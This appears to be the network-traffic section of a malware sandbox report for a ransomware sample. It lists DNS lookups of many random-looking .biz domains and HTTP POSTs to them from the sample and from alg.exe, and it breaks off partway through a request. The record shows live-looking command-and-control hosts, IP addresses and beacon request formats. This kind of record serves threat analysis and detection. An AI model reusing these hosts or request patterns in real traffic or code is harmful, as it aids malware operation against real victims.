Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gvijgjwkh.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gvijgjwkh.biz

IN A

Response

gvijgjwkh.biz

IN A

3.94.10.34
POST

http://gvijgjwkh.biz/ftkwwo

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

3.94.10.34:80

Request

POST /ftkwwo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ab75d2d66359b6a1ce5e616371c8ffd2|194.110.13.70|1723257687|1723257687|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

qpnczch.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

qpnczch.biz

IN A

Response

qpnczch.biz

IN A

44.213.104.86
POST

http://qpnczch.biz/nuogu

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

44.213.104.86:80

Request

POST /nuogu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ee7c90f62ef7a9264f114076ff2387a1|194.110.13.70|1723257687|1723257687|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

opowhhece.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

opowhhece.biz

IN A

Response

opowhhece.biz

IN A

18.208.156.248
DNS

brsua.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

brsua.biz

IN A

Response

brsua.biz

IN A

3.254.94.185
POST

http://opowhhece.biz/tntkdjmqlepeqrd

alg.exe

Remote address:

18.208.156.248:80

Request

POST /tntkdjmqlepeqrd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=75dff09d7120a57d6dbfbaa40df85752|194.110.13.70|1723257687|1723257687|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://brsua.biz/buhwillsnkahdc

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

3.254.94.185:80

Request

POST /buhwillsnkahdc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: brsua.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=275a8e9602e9e3c3e25ad9595e47ced1|194.110.13.70|1723257687|1723257687|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zjbpaao.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zjbpaao.biz

IN A

Response
DNS

jdhhbs.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jdhhbs.biz

IN A

Response

jdhhbs.biz

IN A

13.251.16.150
DNS

dlynankz.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

dlynankz.biz

IN A

Response

dlynankz.biz

IN A

85.214.228.140
POST

http://jdhhbs.biz/le

alg.exe

Remote address:

13.251.16.150:80

Request

POST /le HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=508d3676c0173179e11d913bb60d79d1|194.110.13.70|1723257688|1723257688|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://dlynankz.biz/sgofhymid

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

85.214.228.140:80

Request

POST /sgofhymid HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 404 Not Found

Server: nginx/1.27.0
Date: Sat, 10 Aug 2024 02:41:28 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
DNS

oflybfv.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

oflybfv.biz

IN A

Response

oflybfv.biz

IN A

47.129.31.212
POST

http://oflybfv.biz/myf

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

47.129.31.212:80

Request

POST /myf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oflybfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=da616d838dba8c0c2bac80d1906cf77d|194.110.13.70|1723257689|1723257689|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

mgmsclkyu.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

mgmsclkyu.biz

IN A

Response

mgmsclkyu.biz

IN A

34.246.200.160
POST

http://mgmsclkyu.biz/mhtdtdoseyinvm

alg.exe

Remote address:

34.246.200.160:80

Request

POST /mhtdtdoseyinvm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mgmsclkyu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5c1ae1b361b6d9673882175aba8ea1f8|194.110.13.70|1723257689|1723257689|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

yhqqc.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

yhqqc.biz

IN A

Response

yhqqc.biz

IN A

34.211.97.45
DNS

warkcdu.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

warkcdu.biz

IN A

Response

warkcdu.biz

IN A

18.141.10.107
POST

http://warkcdu.biz/cipbtkgbdwuic

alg.exe

Remote address:

18.141.10.107:80

Request

POST /cipbtkgbdwuic HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: warkcdu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d3aa14c3e8f134b2b768f5e42a180084|194.110.13.70|1723257690|1723257690|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://yhqqc.biz/xq

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

34.211.97.45:80

Request

POST /xq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yhqqc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8d3bcbe4537d052103dc5d84446e838c|194.110.13.70|1723257689|1723257689|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

mnjmhp.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

mnjmhp.biz

IN A

Response

mnjmhp.biz

IN A

47.129.31.212
POST

http://mnjmhp.biz/xeyhwgjusghv

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

47.129.31.212:80

Request

POST /xeyhwgjusghv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=76e38c9235912502d1dda1f7ebb39c25|194.110.13.70|1723257690|1723257690|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gcedd.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gcedd.biz

IN A

Response

gcedd.biz

IN A

13.251.16.150
POST

http://gcedd.biz/mblrmvhwptqty

alg.exe

Remote address:

13.251.16.150:80

Request

POST /mblrmvhwptqty HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gcedd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c7e41be8ccf141c067e209088f8de5dc|194.110.13.70|1723257691|1723257691|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

opowhhece.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

opowhhece.biz

IN A

Response

opowhhece.biz

IN A

18.208.156.248
POST

http://opowhhece.biz/wdtuaxbrwwl

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.208.156.248:80

Request

POST /wdtuaxbrwwl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=788ffe17cd8318e6695f490c6048e84d|194.110.13.70|1723257691|1723257691|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zjbpaao.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zjbpaao.biz

IN A

Response
DNS

jdhhbs.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jdhhbs.biz

IN A

Response

jdhhbs.biz

IN A

13.251.16.150
POST

http://jdhhbs.biz/pmmohmcpnduukf

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

13.251.16.150:80

Request

POST /pmmohmcpnduukf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=74f6e2ca4f0885f07446776d84b92af7|194.110.13.70|1723257692|1723257692|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jwkoeoqns.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jwkoeoqns.biz

IN A

Response

jwkoeoqns.biz

IN A

18.208.156.248
POST

http://jwkoeoqns.biz/ukiefard

alg.exe

Remote address:

18.208.156.248:80

Request

POST /ukiefard HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jwkoeoqns.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=de094e563deea4932a3f33befcd00d7e|194.110.13.70|1723257691|1723257691|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xccjj.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

xccjj.biz

IN A

Response

xccjj.biz

IN A

44.213.104.86
POST

http://xccjj.biz/chstmolcvoddsxm

alg.exe

Remote address:

44.213.104.86:80

Request

POST /chstmolcvoddsxm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xccjj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c5918927273c26cae974609a0ed3c2f9|194.110.13.70|1723257691|1723257691|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

hehckyov.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

hehckyov.biz

IN A

Response

hehckyov.biz

IN A

44.221.84.105
POST

http://hehckyov.biz/paxgdiwt

alg.exe

Remote address:

44.221.84.105:80

Request

POST /paxgdiwt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hehckyov.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7aa2773990a0cb4b9eb44ff3afb429da|194.110.13.70|1723257692|1723257692|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

rynmcq.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rynmcq.biz

IN A

Response

rynmcq.biz

IN A

54.244.188.177
POST

http://rynmcq.biz/miaedpo

alg.exe

Remote address:

54.244.188.177:80

Request

POST /miaedpo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rynmcq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a3f43e8606082000e0d04d0362aacfec|194.110.13.70|1723257692|1723257692|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

mgmsclkyu.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

mgmsclkyu.biz

IN A

Response

mgmsclkyu.biz

IN A

34.246.200.160
POST

http://mgmsclkyu.biz/afjfaxckahjgpxg

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

34.246.200.160:80

Request

POST /afjfaxckahjgpxg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mgmsclkyu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bcbd515b5cae78ebaf952fe01f226d8f|194.110.13.70|1723257692|1723257692|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

warkcdu.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

warkcdu.biz

IN A

Response

warkcdu.biz

IN A

18.141.10.107
POST

http://warkcdu.biz/rrqofswiww

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /rrqofswiww HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: warkcdu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=72b3c3e1d1d01ea2c137fa514e4a87e5|194.110.13.70|1723257693|1723257693|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uaafd.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

uaafd.biz

IN A

Response

uaafd.biz

IN A

3.254.94.185
POST

http://uaafd.biz/eo

alg.exe

Remote address:

3.254.94.185:80

Request

POST /eo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uaafd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=786b47104e9d1d6974f89bd387392243|194.110.13.70|1723257693|1723257693|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

eufxebus.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

eufxebus.biz

IN A

Response

eufxebus.biz

IN A

18.141.10.107
POST

http://eufxebus.biz/g

alg.exe

Remote address:

18.141.10.107:80

Request

POST /g HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: eufxebus.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f3db7e815d9b17d4e7b78603944db5f1|194.110.13.70|1723257694|1723257694|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gcedd.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gcedd.biz

IN A

Response

gcedd.biz

IN A

13.251.16.150
POST

http://gcedd.biz/vh

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

13.251.16.150:80

Request

POST /vh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gcedd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a620e274e6416f4262dc028a43baadad|194.110.13.70|1723257694|1723257694|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pwlqfu.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

pwlqfu.biz

IN A

Response

pwlqfu.biz

IN A

34.246.200.160
POST

http://pwlqfu.biz/mokjawbdjkimvpn

alg.exe

Remote address:

34.246.200.160:80

Request

POST /mokjawbdjkimvpn HTTP/1.1
